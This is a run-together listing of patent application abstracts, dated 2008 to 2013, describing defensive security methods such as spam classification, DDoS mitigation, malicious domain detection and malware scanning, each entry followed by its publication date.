20090307771DETECTING SPAM EMAIL USING MULTIPLE SPAM CLASSIFIERS - A method for detecting undesirable emails combines input from two or more spam classifiers to provide improved classification effectiveness and robustness. The method includes obtaining a score from each of a plurality of constituent spam classifiers by applying them to a given input email. The method further includes obtaining a combined spam score from a combined spam classifier that takes as input the plurality of constituent spam classifier scores, the combined spam classifier being computed automatically in accordance with a specified false-positive vs. false-negative tradeoff. The method further includes identifying the given input email as an undesirable email if the combined spam score indicates that the input e-mail is undesirable.12-10-2009
20090307770APPARATUS AND METHOD FOR PERFORMING INTEGRITY CHECKS ON SOFTWARE - An apparatus and method are provided for performing integrity checking of software code executing on a processing unit of the apparatus. The apparatus further includes debug logic used when debugging program code executed by the processing unit, and trusted logic for performing trusted integrity checking operations on less-trusted program code executed by the processing unit. The debug logic has an interface via which the trusted logic can program one or more control registers, that interface not being accessible by the less-trusted program code. The trusted logic programs the control registers so as to cause the debug logic to be re-used to detect one or more activities of the processing unit during execution of the less-trusted program code, and the trusted integrity checking operations performed by the trusted logic are influenced by the activities detected by the debug logic. Such an approach has been found to provide an efficient and secure technique for performing run-time integrity checking of program code.12-10-2009
20090307769METHOD AND APPARATUS FOR PROVIDING NETWORK SECURITY - The invention relates to the provision of virus scanning capabilities in a network environment. Optimum use is made of a plurality of virus scanners by inspecting content passed over the network to identify which of the scanners is most suitable for that content. The content is then passed to the appropriate scanners in dependence on the results of the inspection.12-10-2009
20120297476Verifying Transactions Using Out-of-Band Devices - The present disclosure relates to verifying transactions using user devices. A client device is used to complete a transaction with a server computer. The client device communicates with a user device such as a smart phone, laptop computer, or other computing device. The user device communicates with the client device and a verification server via an out-of-band communication channel. The verification server receives two or more copies of session data associated with the transaction occurring between the client device and the server computer. One copy of the session data is received from the server computer and another copy of the session data is provided by the user device. The two copies of the session data are compared by the verification server or by the user device, and mismatches are reported as suspected malicious software attacks.11-22-2012
20090100518SYSTEM AND METHOD FOR DETECTING SECURITY DEFECTS IN APPLICATIONS - A system and method for detecting vulnerabilities in a deployed web application includes developing a profile of acceptable behavior for inbound communication and outbound communication of a web application. The method also includes receiving a current inbound communication and a current outbound communication from the web application. The current inbound communication includes an inbound user request and the current outbound communication is in response to the current inbound communication. The current inbound communication and the current outbound communication are validated with the profile of acceptable behavior to identify an anomaly. The identified anomaly includes an occurrence of an acceptable behavior for the current inbound communication in combination with an occurrence of an unacceptable behavior for the current outbound communication.04-16-2009
20120192271Apparatus and Method for Enhancing Security of Data on a Host Computing Device and a Peripheral Device - A method is provided of enhancing security of at least one of a host computing device and a peripheral device. In the method, the host computing device is coupled to the peripheral device through a communication interface. The method includes transparently receiving data from one of the peripheral device and the host computing device, and storing the received data. The method further includes analyzing the stored data to identify a circumstance posing a security risk. If analyzing does not identify such a circumstance, then the method includes transparently echoing the data to the other of the peripheral device and the host. If analyzing does identify such a circumstance, then the method includes performing a security process defined by a rule. Related apparatus is provided, as well as other methods and apparatus.07-26-2012
20110016524BLIND VERIFICATION OF COMPUTER FIRMWARE - Disclosed are means for using zero-knowledge protocols to provide assurance that the executable program instructions in a particular computing device are identical to a given set of executable program instructions, without revealing the executable program instructions themselves.01-20-2011
20130167229TRAFFIC MANAGING DEVICE AND METHOD THEREOF - Disclosed is a traffic managing device which includes an information collector collecting primary information associated with a flow; a controller judging a traffic state, collecting secondary information associated with the traffic based on the judged traffic state and the primary information, and judging whether the flow is abnormal, based on the secondary information; and a traffic correspondence unit dropping the flow based on the judged traffic state and whether the flow is abnormal. The primary information includes internet protocol addresses of source and destination of the flow and the secondary information includes a flow number of each internet protocol address of a source.06-27-2013
20130074184PACKET PROCESSING IN A MULTIPLE PROCESSOR SYSTEM - Packet processing is provided in a multiple processor system including a first processor to process a packet and to create a tag associated with the packet. The tag includes information about the processing of the packet. A second processor receives the packet subsequent to the first processor and processes the packet using the tag information.03-21-2013
20130074183METHOD AND APPARATUS FOR DEFENDING DISTRIBUTED DENIAL-OF-SERVICE (DDOS) ATTACK THROUGH ABNORMALLY TERMINATED SESSION - There are provided a method and apparatus for defending a Distributed Denial-of-Service (DDoS) attack through abnormally terminated sessions. The DDoS attack defending apparatus includes: a session tracing unit configured to parse collected packets, to extract header information from the collected packets, to trace one or more abnormally terminated sessions corresponding to one of pre-defined abnormally terminated session cases, based on the header information, and then to count the number of the abnormally terminated sessions; and an attack detector configured to compare the number of the abnormally terminated sessions to a predetermined threshold value, and to determine whether a DDoS attack has occurred, according to the results of the comparison. Therefore, it is possible to significantly reduce a false-positive rate of detection of a DDoS attack and the amount of computation for detection of a DDoS attack.03-21-2013
20130074182INFORMATION PROCESSING APPARATUS AND CONTROL METHOD OF THE SAME - A device function to be used by an application is specified, a risk level of the specified device function is acquired, and a risk level of the application is calculated based on the acquired risk level of the device function.03-21-2013
20130074181Auto Migration of Services Within a Virtual Data Center - Techniques are provided herein for detecting that virtual data center services provided to one of at least two customers are being subjected to an attack, wherein the virtual data center services are provided to the at least two customers using a same first set of physical servers via a first network element such as a physical access switch, and responsive to detecting that virtual data center services provided to the one of the at least two customers are being subjected to an attack (e.g., a virus or denial of service attack), the technique causes the virtual data center services provided to the one of the at least two customers to be migrated to, e.g., instantiated on, a second set of physical servers that is not accessible via the first network element.03-21-2013
20100281537SECURE MULTI-PRINCIPAL WEB BROWSER - A web browser operating system using a browser kernel places principals having different origins in separate principal instances, where each separate principal instance executes in a separate protection domain. Principal origin may be determined using the combination of protocol, domain name, and port. The browser kernel mediates communications between principal instances, and between the principal instances and the operating system. Within each principal instance, a browser runtime executes as a restricted operating system process (ROSP), while any plugins are executed as a separate ROSP. Renderings from each browser runtime are combined by the browser kernel for presentation to a user.11-04-2010
20130061321Using Aggregated DNS Information Originating from Multiple Sources to Detect Anomalous DNS Name Resolutions - A DNS security system collects and uses aggregated DNS information originating from a plurality of client computers to detect anomalous DNS name resolutions. A server DNS security component receives multiple transmissions of DNS information from a plurality of client computers, each transmission of DNS information concerning a specific instance of a resolution of a specific DNS name. The server component aggregates the DNS information from the multiple client computers. The server component compares DNS information received from a specific client computer concerning a specific DNS name to aggregated DNS information received from multiple client computers concerning the same DNS name to identify anomalous DNS name resolutions. Where an anomaly concerning received DNS information is identified, a warning can be transmitted to the specific client computer from which the anomalous DNS information was received.03-07-2013
20090282480Apparatus and Method for Monitoring Program Invariants to Identify Security Anomalies - A computer readable storage medium includes executable instructions to insert monitors at selected locations within a computer program. Training output from the monitors is recorded during a training phase of the computer program. Program invariants are derived from the training output. During a deployment phase of the computer program, deployment output from the monitors is compared to the program invariants to identify security anomalies.11-12-2009
20080282346Data Type Management Unit - A data type management unit. The data type management unit is configured to include a rules module which includes at least one identification standard paired with an associated code type, an interface module configured to receive a code signal, and an analysis module coupled to the interface module and to the rules module. Each identification standard includes a comparison rule paired with an associated rejection criteria; the comparison rule of each identification standard includes at least one code pattern representative of the associated code type; and the rejection criteria of each identification standard includes at least one rejection rule. The analysis module is configured to compare the received code signal to each code pattern in each identification standard and to recognize if one or more of the comparison results violates one or more of the rejection rules.11-13-2008
20090055928METHOD AND APPARATUS FOR PROVIDING PHISHING AND PHARMING ALERTS - Provided is an Internet information security technique, and more particularly, a method for alerting a user that a connected web site is a phishing site by comparing connected web site information with normal site information.02-26-2009
20130185792DYNAMIC EXECUTION PREVENTION TO INHIBIT RETURN-ORIENTED PROGRAMMING - A method, apparatus, and/or system for execution prevention is provided. A state indicator for a first subset of a plurality of memory pages of executable code in a memory device is set to a non-executable state. A state indicator for a second subset of the plurality of memory pages is set to an executable state, where the second subset of the plurality of memory pages includes indirection stubs to functions in the first subset of the plurality of memory pages. Upon execution of an application, a function call is directed to a corresponding indirection stub in the second subset of the plurality of memory pages which modifies the state indicator for a corresponding function in the first subset of the plurality of memory pages prior to directing execution of the called function from the first subset of the plurality of memory pages.07-18-2013
20120117645DETECTION CIRCUIT, DETECTION METHOD THEREOF, AND MEMORY SYSTEM INCLUDING THE DETECTION CIRCUIT - A detection circuit, including a sensing circuit configured to sense whether there is an external attack and generate second data from first data, a data conversion circuit configured to convert the first data to third data, and a comparator configured to compare the second data with the third data.05-10-2012
20120117646TRANSMISSION CONTROL PROTOCOL FLOODING ATTACK PREVENTION METHOD AND APPARATUS - Disclosed herein is a Transmission Control Protocol (TCP) flooding attack prevention method. The TCP flooding attack prevention method includes identifying the type of a packet received at an intermediate stage between a client and a server; determining the direction of the packet; defining a plurality of session states based on the type and the direction of the packet; detecting a TCP flooding attack by tracking the session states for each flow; and responding to the TCP flooding attack based on the type of the TCP flooding attack.05-10-2012
20130067571METHOD AND SYSTEM FOR MANAGING SUSPICIOUS DEVICES ON NETWORK - A method and system for managing suspicious devices on a network. The method includes: setting, based on a manager's input or selection via a user interface, a suspicious group corresponding to each of at least one suspicious management item for managing a plurality of devices on a network; accessing the devices and reading information corresponding to the suspicious management item; determining whether each device is a suspicious device based on the information corresponding to the suspicious management item, and registering the device in the suspicious group if the device is determined to be a suspicious device; checking whether an error of a device comprised in the suspicious group is resolved; and eliminating the device from the suspicious group if the error of the device is resolved.03-14-2013
20130067573SYSTEM AND METHOD FOR HUMAN IDENTIFICATION PROOF FOR USE IN VIRTUAL ENVIRONMENTS - System, method and computer program product for verifying an avatar owner as a human user of an avatar in a virtual world environment in which humans interact through avatars via client devices in network communication with a server device. A request for challenging an avatar in the virtual world environment is received to determine whether that avatar is controlled by an application program user (bot). A user client device associated with a challenged avatar is identified and a Human Identification Proof (HIP) message for detecting a human user versus a bot controlling the challenged avatar is generated and communicated, for receipt at the identified user client device. It is determined from the response, whether the user is a bot or a human user. If a challenged avatar is determined to be a bot, then the server device prevents the challenged avatar from further interaction in the virtual world environment.03-14-2013
20130067572SECURITY EVENT MONITORING DEVICE, METHOD, AND PROGRAM - The security event monitoring device includes: a storage module which stores in advance a correlation rule; a log collection unit which receives each log from each monitoring target device; a correlation analysis unit which generates scenario candidates by associating each of the logs; a scenario candidate evaluation unit which calculates the importance degrees of each scenario candidate; and a result display unit which displays/outputs the scenario candidate of a high importance degree. The scenario candidate evaluation unit includes: a user association degree evaluation function which calculates user association degrees; an operation association degree evaluation function which calculates the operation association degrees; and a scenario candidate importance reevaluation function which recalculates the importance degrees of each of the scenario candidates by each user according to the user association degrees and the operation association degrees.03-14-2013
20130067570Content Inspection - Content inspection techniques are described. In one or more implementations, it is detected that an application executing on a computing device is calling a particular code element of a group of code elements to be used to process content. For example, the group of code elements can include a pre-specified group of code elements (e.g., functions and/or properties) that may enable access to particular functionalities of a computing device and thus are associated with a known security risk. It is then ascertained that the content is untrusted and, in response to ascertaining that the content is untrusted, the content is inspected to determine if the content is safe to be passed to the code element.03-14-2013
20110023117Method and System for Restricting Access to User Resources - A user's set top box (STB), or other client, executes a shell and has an application program interface (API) by which certain features of the client can be controlled. The client is in communication with a walled garden proxy server (WGPS), which controls access to a walled garden. The walled garden contains links to one or more servers providing network-based services. The client sends a request to the WGPS to access a service provided by a site in the garden. To provide the service, the site sends the client a message containing code calling a function in the API. The WGPS traps the message from the site and looks up the site in a table to determine the access control list (ACL) for the site. The ACL is a bit-map that specifies which functions of the client's API can be invoked by code from the site. The WGPS includes the ACL in the header of the hypertext transport protocol (HTTP) message to the client. The shell receives the message and extracts the ACL. The shell uses the ACL to determine whether the code has permission to execute any called functions in the API. If the code lacks permission, the shell stops execution and sends a message to the site indicating that the site lacks permission. Otherwise, the shell allows the code to call the function.01-27-2011
20110023116METHOD AND APPARATUS FOR SPAM SHORT MESSAGE DETECTION - A method and apparatus for spam short message detection. The method includes obtaining sending characteristics of at least two suspected short message sources, judging whether the two suspected short message sources have similar sending characteristics, and determining the two suspected short message sources to be a spammer if they have similar sending characteristics. A spammer that makes multiple short message sources send short messages alternately can be detected through the similar sending characteristics of the short message sources.01-27-2011
20110023115HOST INTRUSION PREVENTION SYSTEM USING SOFTWARE AND USER BEHAVIOR ANALYSIS - In embodiments of the present invention improved capabilities are described for threat detection using a behavioral-based host-intrusion prevention method and system for monitoring a user interaction with a computer, software application, operating system, graphic user interface, or some other component or client of a computer network, and performing an action to protect the computer network based at least in part on the user interaction and a computer code process executing during or in association with a computer usage session.01-27-2011
20110023114Method and System For Traffic Management Via Virtual Machine Migration - Aspects of a method and system for traffic management via virtual machine migration include detecting an abnormal traffic pattern in traffic communicated by a first virtual machine that utilizes a first set of network resources. Responsive to the detection of the abnormal pattern, a second virtual machine that utilizes a second set of network resources may be initialized. The second virtual machine may take over functions performed by the first virtual machine, and initialization of the second virtual machine is based on an analysis of the traffic. The second virtual machine may be initialized utilizing stored virtual machine state information in instances where the abnormal traffic is a result of a malicious attack. The second virtual machine may be initialized utilizing current virtual machine state information in instances where the abnormal traffic is not a result of a malicious attack.01-27-2011
20120198549METHOD AND SYSTEM FOR DETECTING MALICIOUS DOMAIN NAMES AT AN UPPER DNS HIERARCHY - A method and system for detecting a malicious domain name, comprising: collecting domain name statistical information from a non-recursive domain name system name server (RDNS NS); and utilizing the collected domain name statistical information to determine if a domain name is malicious or benign.08-02-2012
20120272315QUARANTINING PACKETS RECEIVED AT DEVICE IN NETWORK COMMUNICATIONS UTILIZING VIRTUAL NETWORK CONNECTION - A method of engaging in network communications by a device includes spawning a first virtual machine for a network connection that virtualizes network capabilities of a device; receiving a packet communicated from a transmitting device at the first virtual machine of the device; determining that the packet is corrupted, said determination being based on information from an application running on the device; in response to said step of determining that the packet is corrupted, quarantining the packet; spawning a second virtual machine for a network connection that virtualizes network capabilities of the device; and communicating, using the second virtual machine, a message to the transmitting device.10-25-2012
20120272314DATA COLLECTION SYSTEM - A data collection system for generating alerts is disclosed. In some embodiments, information is gathered from a plurality of internet facilities that are used for malicious purposes. In response to detecting in the gathered information data that satisfies an alert condition associated with malicious activity, an alert to warn a potential target of the malicious activity is generated.10-25-2012
20090013406DYNAMIC TRUST MANAGEMENT - A method and apparatus are provided for tracking the state of a software component in use on a computing platform. Upon a change of a first type in the software component (such as a change to an integrity-critical part of the component), an appropriate integrity metric of the software component is reliably measured and recorded in cumulative combination with any previous integrity metric values recorded for changes of the first type to the software component. Upon a change of a second type in the software component (such as a change to a non integrity-critical part of the component), an appropriate integrity metric of the software component is reliably measured and recorded as a replacement for any previous integrity metric value recorded for changes of the second type to the software component. The two resultant values provide an indication of the integrity state of the software component.01-08-2009
20090013405Heuristic detection of malicious code - Scanning of computer files for malware uses a classifying technique to classify an input file as a clean file or a dirty file. The parameters of the classifying technique are derived to train the classification on a corpus of reference files including clean files known to be free of malware and dirty files known to contain malware. The classification is performed using a representation of the files in a feature space defined by a set of predetermined features for respective file formats, the features being a predetermined value or range of values for one or more data fields of given meanings. The representation of a file is derived by determining the file format, parsing the file on the basis of the structure of data fields in the determined file format to identify the data fields and their meaning, and determining, on the basis of the identified data fields, which of the set of predetermined features are present.01-08-2009
20090007265Defending Against Denial Of Service Attacks - In various embodiments, a server may be provided. The server may respond to a request for a service, from a processing device, with a challenge. The challenge may include a partial key for a memory-intensive operation, a number of iterations of the memory-intensive operation to perform, and a result of performing the number of iterations of the memory-intensive operation. Upon receiving the challenge, the processing device may choose a complete key consistent with the partial key and may produce a proposed result by performing the memory-intensive operation for the number of iterations. When the proposed result matches the result included in the challenge, the processing device may send a challenge answer, including the chosen complete key, to the server. Upon receiving a correct challenge answer from the processing device, the server may access the requested service and may return a result of the access to the processing device.01-01-2009
20090007264SECURITY SYSTEM WITH COMPLIANCE CHECKING AND REMEDIATION - A security system is provided for use with computer systems. In various embodiments, the security system can analyze the state of security of one or more computer systems to determine whether the computer systems comply with expressed security policies and to remediate the computer systems so that they conform with the expressed security policies. In various embodiments, the security system can receive compliance documents, determine whether one or more computer systems comply with portions of security policies specified in the compliance documents, and take actions specified in the compliance documents to cause the computer systems to comply with the specified security policies. The security system may provide a common, unified programming interface that applications or tools can employ to verify or enforce security policies.01-01-2009
20090007263Method and Apparatus for Combining Traffic Analysis and Monitoring Center in Lawful Interception - A method and apparatus for integrating intercepted information with information obtained from at least one data retention source, the method comprising receiving intercepted information from an interception source, receiving information from a data retention source, and analyzing the information received from the data retention source in association with the intercepted information. The intercepted information can comprise metadata related to the intercepted communications, and/or the contents of the communications themselves. This enables a user such as a law enforcement agency to reveal possibly indirect connections between target entities, wherein the connections involve non-target entities. The method and apparatus combine interception and content analysis methodologies with traffic analysis techniques.01-01-2009
20120240228MULTI-DIMENSIONAL REPUTATION SCORING - Methods and systems for assigning reputation to communications entities include collecting communications data from distributed agents, aggregating the communications data, analyzing the communications data and identifying relationships between communications entities based upon the communications data.09-20-2012
20080295169DETECTING AND DEFENDING AGAINST MAN-IN-THE-MIDDLE ATTACKS11-27-2008
20130167230DEVICE REPUTATION MANAGEMENT - A device reputation server recognizes malicious devices used in prior attacks and prevents further attacks by the malicious devices. Server computers require a digital fingerprint of any client devices prior to providing any service to such client devices. Logging of network activity includes the digital fingerprint of the device perpetrating the attack. When an attack is detected or discovered, the attacked server reports the attack and the digital fingerprint of the perpetrating device to a device reputation server. The device reputation server uses the report to improve future assessments of the reputation of the device associated with the reported digital fingerprint.06-27-2013
20110239294SYSTEM AND METHOD FOR DETECTING MALICIOUS SCRIPT - Provided are a system and method for detecting a malicious script. The system includes a script decomposition module for decomposing a web page into scripts, a static analysis module for statically analyzing the decomposed scripts in the form of a document file, a dynamic analysis module for dynamically executing and analyzing the decomposed scripts, and a comparison module for comparing an analysis result of the static analysis module and an analysis result of the dynamic analysis module to determine whether the decomposed scripts are malicious scripts. The system and method can recognize a hidden dangerous hypertext markup language (HTML) tag irrespective of an obfuscation technique for hiding a malicious script in a web page and thus can cope with an unknown obfuscation technique.09-29-2011
20100218252NETWORK PROTECTION VIA EMBEDDED CONTROLS - The present disclosure provides a method for providing network protection. A method according to one embodiment may include detecting an infected data packet at an in-line device. The method may further include receiving a first instruction from the in-line device at a central management server, the instruction identifying the origin of the infected data packet. The method may also include receiving a marking instruction from the central management server at an infected endpoint device and marking outgoing data packets at the infected endpoint device to create marked data packets. Of course, many alternatives, variations and modifications are possible without departing from this embodiment.08-26-2010
20110126285INTERNET SITE SECURITY SYSTEM AND METHOD THERETO - The present invention discloses an internet site security system and method thereof. The present invention comprises: a browser execution module which executes the browser for providing a work-performing environment on the internet site according to the selection of a user; a memory protection module which, according to the execution of the browser, prevents an external module from accessing a memory area allocated to the browser and detects whether the memory area has been tampered with and whether the executing code has been tampered with; and a browser protection module which prevents another process or module from debugging the browser execution module according to the execution of the browser, and which distinguishes the several modules loaded into the memory area into acceptable modules and unacceptable modules, and is thereby able to provide a secure electronic transaction environment against a malicious attack.05-26-2011
20110283355EDGE COMPUTING PLATFORM FOR DELIVERY OF RICH INTERNET APPLICATIONS - An edge computing platform that provides on-demand delivery of Rich Internet Applications and other applications is disclosed. One embodiment includes an optional manager node and content distribution network (CDN) that include one or more compute nodes. The CDN collects information pertaining to execution of a software application. The CDN aggregates the information and transfers the aggregated information to the manager node. The manager node analyzes the information from the CDN and transfers results of the analysis to the CDN. The CDN receives a software application that is designed to be dynamically updated when executed at the clients. The CDN modifies the software application based on the information from the manager node. The CDN receives a request that pertains to the software application from a client device. The CDN transfers at least a portion of the modified software application to the client.11-17-2011
20110283356Security Monitoring - Disclosed are systems, apparatus, methods, and computer readable media for determining a combined trust level for a website. In one embodiment, a user account associated with the creation or maintenance of the website may be analyzed. The analysis of the user account may be capable of identifying the presence or absence of a first risk factor affecting a likelihood that the user account is engaged in a malicious activity. A source code file capable of being used to create a message for sending to a remote computing device may be analyzed. The analysis of the source code file may be capable of identifying the presence or absence of a second risk factor affecting a likelihood that the source code file is facilitating a malicious activity. Based on the analysis, a combined trust level for the website may be determined.11-17-2011
20110283357SYSTEMS AND METHODS FOR IDENTIFYING MALICIOUS DOMAINS USING INTERNET-WIDE DNS LOOKUP PATTERNS - Systems and methods are disclosed for identifying domains as malicious based on Internet-wide DNS lookup patterns. Disclosed embodiments look for variance in the servers that look up a domain and also look at the popularity growth (quantity of queries from unique addresses) of a domain after registration to identify malicious domains. Other disclosed embodiments measure the similarity of servers that query a domain and cluster domains based on the similarity of those servers. Disclosed embodiments may use such temporal and spatial lookup patterns as input to a blacklist process to more effectively and quickly blacklist domains based on their Internet-wide lookup patterns.11-17-2011
20080271144METHOD FOR THE AUTHENTICATED TRANSMISSION OF A PERSONALIZED DATA SET OR PROGRAM TO A HARDWARE SECURITY MODULE IN PARTICULAR OF A FRANKING MACHINE - In a method and arrangement for authenticated transmission of a personalized data set or program to a hardware security module in a device such as a franking machine, a system manufacturer buys security modules from a security module manufacturer, incorporates the security modules into the device at a production site, and loads a data set and/or an application program into the security module, making the device operable. Authentication occurs using a first security module-specific fixed code, a second security module-specific fixed code that is calculated from the first code according to a given algorithm, and a third security module-specific fixed code that is calculated from the second code and the data in the data set and/or in the program.10-30-2008
20090150997APPARATUS AND METHOD FOR DETECTING MALICIOUS FILE IN MOBILE TERMINAL - Provided is an apparatus and method for detecting a malicious file that attempts to initiate communication in a mobile terminal without a user's approval. The method of detecting a malicious file in a mobile terminal includes: determining whether a file to be examined is an executable file; when the file is an executable file, examining whether the file is a malicious file that can cause unapproved communication based on at least one predetermined examination condition; and outputting the result of examining whether the file is the malicious file. Accordingly, an attack caused by a new type of malicious code can be coped with.06-11-2009
20090150998REMOTE COLLECTION OF COMPUTER FORENSIC EVIDENCE - The invention is directed to techniques for allowing a user to remotely interrogate a target computing device in order to collect and analyze computer evidence that may be stored on the target computing device. A forensic device receives input from a remote user that identifies computer evidence to acquire from the target computing device. The forensic device acquires the computer evidence from the target computing device and presents a user interface for the forensic device through which the remote user views the computer evidence acquired from the target computing device. In this manner, the forensic device allows the user to interrogate the target computing device to acquire the computer evidence without seizing or otherwise “shutting down” the target device.06-11-2009
20080216174Sensitive Data Scanner - A method and system of scanning a client for sensitive data. A server may receive, from the client, a request to scan the data stored in the data storage of the client for sensitive data. In response to receiving the request, the server may provide the client with a scanner, which causes the client to carry out functions including: (a) scanning the data stored in data storage to identify sensitive data; (b) collecting data based on the identified sensitive data; and (c) reporting the collected data. The server may then receive the collected data from the client and responsively analyze the data. The server may also provide feedback about the identified sensitive data to the client or another server.09-04-2008
20110302652SYSTEM AND METHOD FOR DETECTING REAL-TIME SECURITY THREATS IN A NETWORK DATACENTER - The system and method described herein may include a configuration management database that describes every known service endpoint in a network datacenter to represent a steady state for the datacenter. One or more listeners may then observe traffic in the datacenter in real-time to detect network conversations initiating new activity in the datacenter, which may be correlated, in real-time, with the information in the configuration management database representing the steady state for the datacenter. Thus, in response to the new activity failing to correlate with the known service endpoints, a real-time security alert may be generated to indicate that any network conversations initiating such activity fall out-of-scope from the steady state for the information technology datacenter.12-08-2011
20110289583CORRELATION ENGINE FOR DETECTING NETWORK ATTACKS AND DETECTION METHOD - A method for detecting network attacks is provided. In one implementation, the method receives a plurality of attack indications based on data transmitted on the network and applies rules to the plurality of attack indications. Also, the method generates an alert if an application of at least a subset of the rules on the plurality of attack indications indicates a potential attack. In addition, a network device that performs the method and a computer program corresponding to the method are provided.11-24-2011
20110296524Campaign Detection - Campaign detection techniques are described. In implementations, a signature is computed for each of a plurality of emails to be communicated by a service provider to respective intended recipients. A determination is made that two or more of the plurality of emails are similar based on the respective signatures. Responsive to a finding that the number of similar emails exceeds a threshold, an indication is output that the similar emails have a likelihood of being involved in a spam campaign.12-01-2011
20110302651VERIFICATION OF A SEGMENTED PROGRAM ON A PARALLEL PROCESSING COMPUTING SYSTEM - Embodiments of the invention provide a method, apparatus, and program product to verify a program that includes a plurality of sections with a computing system that is configured to process a plurality of threads of execution. The method comprises verifying and executing a first section of the program utilizing a first thread of execution in response to activation of the program and determining a second section of the program to execute subsequent to the first section. The method further comprises verifying the second section utilizing a second thread of execution in parallel with the execution of the first section. Another embodiment of the invention provides a method of compiling a program that includes program code by grouping the program code into sections based upon the execution time of the program code and based upon which program code is most commonly executed.12-08-2011
20110302653System and Method for Network Security Including Detection of Attacks Through Partner Websites - A computer readable storage medium has instructions for execution on a computer. The instructions monitor transactions between a server and a set of clients. An evaluation of session indicators associated with the transactions is performed. Individual sessions between the server and individual clients of the plurality of clients are isolated in response to the evaluation.12-08-2011
20130219494METHOD OF ANALYZING THE BEHAVIOR OF A SECURE ELECTRONIC TOKEN - The invention is a method of analyzing the behavior of a secure electronic token which comprises an interface for exchanging data with an external entity. The token has a lifecycle wherein the token is intended to be created then issued. The method comprises the steps of: 08-22-2013
20130219495SYSTEM AND METHOD FOR OPTIMIZATION OF SECURITY TASKS BY CONFIGURING SECURITY MODULES - A system and method for dynamic configuration of the security modules for optimization of execution of security tasks are provided. The system includes: a mechanism for identifying the clients connected to the network; a client data collection unit that determines hardware/software configurations of each detected client; a security module selection and installation unit that selects required modules for each client; a statistics collection unit that collects the security tasks execution statistics from user modules and from client modules; and a configuration unit that configures the client and server modules based on the collected statistics in order to optimize execution of the security tasks.08-22-2013
20120090029METHOD FOR PROTECTING COMPUTER PROGRAMS AND DATA FROM HOSTILE CODE - A method that protects computer data from untrusted programs. Each of the computer's objects and processes is assigned trust attributes, which define the way it can interact with other objects within the system. When an object is classified as untrusted, it can interact with other objects within the system only on a limited basis. A virtualized system is provided on the computer so that when the untrusted object attempts to perform an operation that is outside its scope of authorization, the virtualized system intercepts the operation but presents the untrusted program with an indication that the requested operation has been performed. The method further includes processes to securely move a program from an untrusted group to a trusted group.04-12-2012
20120090028REAL-TIME NETWORK ATTACK DETECTION AND MITIGATION INFRASTRUCTURE - The invention features systems and methods for detecting and mitigating network attacks in a Voice-Over-IP (VoIP) network. A server is configured to receive information related to a mitigation action for a call. The information can include a complexity level for administering an audio challenge-response test to the call and an identification of the call. The server also generates i) a routing label based on the identification of the call, and ii) a script defining a plurality of variables that store identifications of a plurality of altered sound files for the audio challenge-response test. Each altered sound file is randomly selected by the server subject to one or more constraints associated with the complexity level. The server is further configured to transmit the script to a guardian module and the routing label to a gateway.04-12-2012
20100269177SWITCHING NETWORK EMPLOYING A USER CHALLENGE MECHANISM TO COUNTER DENIAL OF SERVICE ATTACKS - A communication infrastructure includes an intermediate routing node that routes a plurality of packets between a source device and a plurality of destination devices, a plurality of templates stored on the intermediate routing node, and a service function. The intermediate routing node, e.g., a switch, router, access point, bridge, or gateway, identifies packets containing requests for a webpage that constitute a service attack attempt by comparing the packet with the plurality of templates. The intermediate routing node then counters the service attack by interacting with the server and client devices: it sends messages with a challenge mechanism to the server and, based on the response or otherwise, sends messages and anti-service-attack downloads to the client devices and receives their responses.10-21-2010
20100058472METHOD FOR PROTECTING COMPUTER PROGRAMS AND DATA FROM HOSTILE CODE - A method that protects computer data from untrusted programs. Each of the computer's objects and processes is assigned trust attributes, which define the way it can interact with other objects within the system. When an object is classified as untrusted, it can interact with other objects within the system only on a limited basis. A virtualized system is provided on the computer so that when the untrusted object attempts to perform an operation that is outside its scope of authorization, the virtualized system intercepts the operation but presents the untrusted program with an indication that the requested operation has been performed. The method further includes processes to securely move a program from an untrusted group to a trusted group.03-04-2010
20100169970SYSTEM AND METHODS FOR DETECTING MALICIOUS EMAIL TRANSMISSION - A system and methods of detecting an occurrence of a violation of an email security policy of a computer system. A model relating to the transmission of prior emails through the computer system is defined which is derived from statistics relating to the prior emails. For selected emails to be analyzed, statistics concerning the selected email are gathered. Such statistics may refer to the behavior or other features of the selected emails, attachments to emails, or email accounts. The determination of whether a violation of an email security policy has occurred is performed by applying the model of prior email transmission to the statistics relating to the selected email. The model may be statistical or probabilistic. A model of prior email transmission may include grouping email recipients into cliques. A determination of a violation of a security policy may occur if email recipients for a particular email are in more than one clique.07-01-2010
20100169969FUNCTIONAL PATCHING/HOOKING DETECTION AND PREVENTION - A method for preventing malicious attacks on software that use the patching method includes providing a database of legitimate and known patches, which contains characteristic code paths of said legitimate patches. The method also includes detecting whether a patch is malicious by inspecting one or more characteristic code paths of the patch and matching the one or more code paths against the database of legitimate and known patches. An activity needed to prevent the malicious patch from performing undesired activities is then performed.07-01-2010
20100169968PROCESSOR EXTENSIONS FOR EXECUTION OF SECURE EMBEDDED CONTAINERS - Methods and apparatus relating to processor extensions for execution of secure embedded containers are described. In an embodiment, a scalable solution for manageability function is provided, e.g., for UMPC environments or otherwise where utilizing a dedicated processor or microcontroller for manageability is inappropriate or impractical. For example, in an embodiment, an OS (Operating System) or VMM (Virtual Machine Manager) Independent (generally referred to herein as “OI”) architecture involves creating one or more containers on a processor by dynamically partitioning resources (such as processor cycles, memory, devices) between the HOST OS/VMM and the OI container. Other embodiments are also described and claimed.07-01-2010
20100169967Apparatus and method for runtime integrity verification - In some embodiments, a processor-based system may include at least one processor, at least one memory coupled to the at least one processor, a code block, and code which is executable by the processor-based system to cause the processor-based system to generate integrity information for the code block upon a restart of the processor-based system, securely store the integrity information, and validate the integrity of the code block during a runtime of the processor-based system using the securely stored integrity information. Other embodiments are disclosed and claimed.07-01-2010
20130219491SYSTEM AND METHOD FOR INTEGRITY RECONSTITUTION - A method of communicating data in a network comprises receiving a copy of a message on a first channel via at least one of a first port and a second port, the first port coupled to a first neighbor node and the second port coupled to a first neighbor's neighbor node; and selecting either the copy of the message received via the first port or the copy of the message received via the second port if a copy of the message is received via both the first port and the second port. If a copy of the message is only received via one of the first port or the second port, the received copy of the message is selected. The selected copy of the message is forwarded on the first channel to a second neighbor node via a third port and to a second neighbor's neighbor node via a fourth port; and the integrity of the selected copy of the message is determined based on supplemental integrity data received from another node, wherein the supplemental integrity data is exclusive of a copy of the message communicated on a second channel.08-22-2013
